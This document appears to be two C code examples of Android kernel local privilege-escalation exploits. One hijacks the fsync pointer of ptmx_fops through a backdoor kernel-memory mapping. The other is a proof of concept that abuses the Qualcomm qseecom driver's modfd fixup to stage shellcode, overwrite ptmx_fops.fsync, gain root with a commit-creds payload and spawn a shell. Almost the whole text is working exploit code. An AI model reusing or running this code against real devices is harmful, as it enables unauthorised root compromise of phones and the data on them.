Beispiel #1
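/*
 * Hijack the fsync slot of ptmx_fops through the backdoor mapping, run the
 * privilege-escalation payload, then put the slot back.
 *
 * Returns true when run_obtain_root_privilege() reports success; false when
 * the ptmx_fops address cannot be resolved, the backdoor mapping is not
 * available (install_backdoor has not been run), or the slot address does
 * not translate into the mapping.
 */
static bool
run_exploit(void)
{
  /* Byte offset of the fsync member inside struct file_operations.
   * 0x38 corresponds to 14 pointer-sized slots on a 32-bit kernel; it must
   * match the target's struct layout — TODO confirm against the target build. */
  const unsigned long int ptmx_fops_fsync_offset = 0x38;
  void **ptmx_fsync_address;
  void *saved_fsync;
  unsigned long int ptmx_fops_address;
  bool ret;

  ptmx_fops_address = get_ptmx_fops_address();
  if (!ptmx_fops_address) {
    return false;
  }

  if (!backdoor_open_mmap()) {
    printf("Failed to mmap due to %s.\n", strerror(errno));
    printf("Run 'install_backdoor' first\n");

    return false;
  }

  ptmx_fsync_address =
    backdoor_convert_to_mmaped_address((void *)(ptmx_fops_address + ptmx_fops_fsync_offset));
  if (!ptmx_fsync_address) {
    /* The mapping is open but the slot did not translate: leave kernel
     * memory untouched rather than dereferencing a null pointer. */
    backdoor_close_mmap();
    return false;
  }

  /* Preserve whatever the slot held so the kernel is restored to its real
   * prior state instead of being assumed to have had a NULL fsync. */
  saved_fsync = *ptmx_fsync_address;
  *ptmx_fsync_address = obtain_root_privilege;

  ret = run_obtain_root_privilege(NULL);

  *ptmx_fsync_address = saved_fsync;

  backdoor_close_mmap();
  return ret;
}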
Beispiel #2
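/* Layout constants for the qseecom PoC. The code is written for a 32-bit ARM
 * target: pointers are assumed to fit in 32 bits throughout. */
enum {
        ABUSE_BUF_LEN = 400,      /* request/response buffer handed to the driver */
        SB_LEN = 8192,            /* shared-buffer length registered via SET_MEM_PARAM */
        FOPS_FSYNC_SLOT = 14,     /* index of fsync in struct file_operations on this kernel */
        PAYLOAD_SCAN_WORDS = 10   /* leading payload words scanned for the placeholder */
};

/* Marker inside shell_code2 that is patched with the address of MyCommitCred. */
static const unsigned int PAYLOAD_PLACEHOLDER = 0xeeeeeeeeu;

/*
 * Issue QSEECOM_IOCTL_SEND_MODFD_CMD_REQ and log the outcome together with the
 * first two words of the request buffer, which the driver may have rewritten.
 * The ioctl return value is only logged, never acted upon: the pointer write
 * this PoC relies on presumably happens before the command itself is rejected
 * (unverified against the driver), so bailing out on a non-zero return could
 * break the technique.
 */
static void
send_modfd_cmd(int fd, struct qseecom_send_modfd_cmd_req *cmd, const unsigned int *words)
{
        printf("QSEECOM_IOCTL_SEND_CMD_REQ");
        int ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, cmd);
        /* Cast to void * so %p receives a pointer-typed argument. */
        printf("return %p %p\n", (void *)(uintptr_t)words[0], (void *)(uintptr_t)words[1]);
        perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
        printf("ioctl return 0x%x \n", (unsigned int)ret);
}

/*
 * Proof of concept: abuse the qseecom "modfd" fixup to (1) leak the address
 * the driver resolves for a DMA buffer, (2) stage a payload at that address
 * in this process, (3) plant the same address into ptmx_fops.fsync, then run
 * the payload and spawn a shell.
 */
int main(int argc, char *argv[]){
        (void)argc;
        (void)argv;

        printf("mypid %d\n", getpid());

        int fd = open("/dev/qseecom", O_RDONLY);
        if (fd < 0) {
                perror("open");
                exit(-1);
        }

        /* Request/response buffer. calloc zero-fills it so the driver never
         * sees stale heap contents; the first 24 words are then seeded with 1. */
        unsigned int *words = calloc(1, ABUSE_BUF_LEN);
        if (!words) {
                perror("calloc");
                exit(-1);
        }
        for (int j = 0; j < 24; j++) {
                words[j] = 0x1;
        }
        void *abuseBuff = words;

        prctl(PR_SET_NAME, "GodFather", 0, 0, 0);

        g_pid = getpid();
        g_tgid = g_pid;
        prctl(PR_SET_NAME, "ihoo.darkytools", 0, 0, 0);

        /* Register a DMA buffer as this client's shared buffer
         * (QSEECOM_IOCTL_SET_MEM_PARAM_REQ). Zero-initialised so any fields
         * not set here are defined. */
        struct qseecom_set_sb_mem_param_req req = {0};
        req.ifd_data_fd = obtain_dma_buf_fd(SB_LEN);
        req.virt_sb_base = abuseBuff;
        req.sb_len = SB_LEN;

        int ret = ioctl(fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &req);
        printf("QSEECOM_IOCTL_SET_MEM_PARAM_REQ return 0x%x \n", (unsigned int)ret);

        /* Command request: all ifd_data entries start zeroed; only entry 0
         * carries the DMA buffer fd. */
        struct qseecom_send_modfd_cmd_req cmd = {0};
        cmd.cmd_req_buf = abuseBuff;
        cmd.cmd_req_len = ABUSE_BUF_LEN;
        cmd.resp_buf = abuseBuff;
        cmd.resp_len = ABUSE_BUF_LEN;
        cmd.ifd_data[0].fd = req.ifd_data_fd;
        cmd.ifd_data[0].cmd_buf_offset = 0;

        /* First command: with offset 0 the driver's fd fixup targets our own
         * buffer, so words[0] receives the address it resolved for the DMA
         * buffer. */
        send_modfd_cmd(fd, &cmd, words);

        /* Map that address in this process and stage the payload there. */
        uintptr_t target = words[0];
        void *addr = mmap((void *)target, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                          MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
        printf("mmap return %p \n", addr);
        if (addr == MAP_FAILED) {
                /* Without the mapping the second command would plant a
                 * pointer to nothing usable in the kernel; stop here instead
                 * of writing through MAP_FAILED. */
                perror("mmap");
                exit(-1);
        }

        /* shell_code2 is assumed to be at least ABUSE_BUF_LEN bytes — TODO confirm. */
        memcpy(addr, shell_code2, ABUSE_BUF_LEN);

        /* Patch the placeholder word with MyCommitCred and log the payload head. */
        unsigned int *payload = addr;
        for (int i = 0; i < PAYLOAD_SCAN_WORDS; i++) {
                if (payload[i] == PAYLOAD_PLACEHOLDER) {
                        payload[i] = (unsigned int)(uintptr_t)MyCommitCred;
                }
                printf("%p\n", (void *)(uintptr_t)payload[i]);
        }

        //c1334e00 b ptmx_fops
        /* Second command: the same fixup now lands on ptmx_fops.fsync
         * (slot FOPS_FSYNC_SLOT of struct file_operations on this kernel).
         * The offset is relative to our request buffer, hence the subtraction. */
        cmd.ifd_data[0].cmd_buf_offset =
                (int)((uintptr_t)(PTMX_FOPS + FOPS_FSYNC_SLOT * 4) - (uintptr_t)abuseBuff);
        send_modfd_cmd(fd, &cmd, words);

        run_obtain_root_privilege();

        /* fd is deliberately not closed before exec: the driver state set up
         * through it may still back the hijacked pointer — TODO confirm. */
        char *argv1[] = {"sh", (char *)0};
        int result = execv("/system/bin/sh", argv1);
        if (result) {
                perror("execv");
        }

        return 0;
}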